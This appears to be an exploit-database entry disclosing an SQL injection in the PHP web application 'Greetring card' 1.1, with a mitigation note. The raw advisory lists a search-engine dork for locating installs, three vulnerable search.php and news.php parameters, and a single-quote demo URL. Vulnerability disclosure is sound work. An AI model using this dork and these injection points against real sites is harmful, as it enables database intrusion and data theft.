Greetring card SQL Injection Vulnerability

vendor:

Greetring card

by:

Net.Edit0r

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Greetring card

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux/PHP

2020

Greetring card SQL Injection Vulnerability

Greetring card SQL Injection Vulnerability is a type of web application vulnerability which allows an attacker to inject malicious SQL queries into vulnerable web application. This vulnerability can be exploited by sending malicious SQL queries to the vulnerable web application. The vulnerable web application will then execute the malicious SQL queries and return the results to the attacker.

Mitigation:

To mitigate this vulnerability, input validation should be done on the server side. All user input should be validated and filtered before being used in any SQL query. Additionally, parameterized queries should be used to prevent SQL injection.

Source

Exploit-DB raw data:

========================================
Grering card SQL Injection Vulnerability
========================================


# Title : Greetring card SQL Injection Vulnerability
# Author : Net.Edit0r
# Location : Iran
# Dork : "Send amazing greetings to your friends and relative!"
# Category : webapps
# Version : 1.1
# Platform : linux/php


[~]######################################### InformatioN
#############################################[~]

[~] Title : Grering card SQL Injection Vulnerability
[~] Author : Net.Edit0r
[~] Email : Net.Edit0r@Att.net ~ Black.Hat.TM@Gmail.com

[~]######################################### ExploiT
#############################################[~]

[~] 1. Vulnerable File :

http://127.0.0.1/search.php?CategoryID=15&SubcategoryID=[SQL]

[~] 2. Vulnerable File :

http://127.0.0.1/search.php?CategoryID=6[SQL]

[~] 3. Vulnerable File :

http://127.0.0.1/news.php?CategoryID=[SQL]

[~] 3. Demo :

http://server/search.php?CategoryID=15&SubcategoryID=60'

[~]######################################### ThankS To ...
############################################[~]

[~] Special Thanks To My Best FriendS :

NetQard , B3hz4d , Raiden , ~[ CriMe ]~ , † CoNstaNtine † , _R3v4l_ ,
~~XTerror~~ , __l2o5v4__ , _Attack_

[~] IRANIAN Young HackerZ

[~] GreetZ : Sun-Army.Org , Phc.Ir , Dark-tunnel.com , AttackerZ.IR

[~]######################################### FinisH :D
#############################################[~]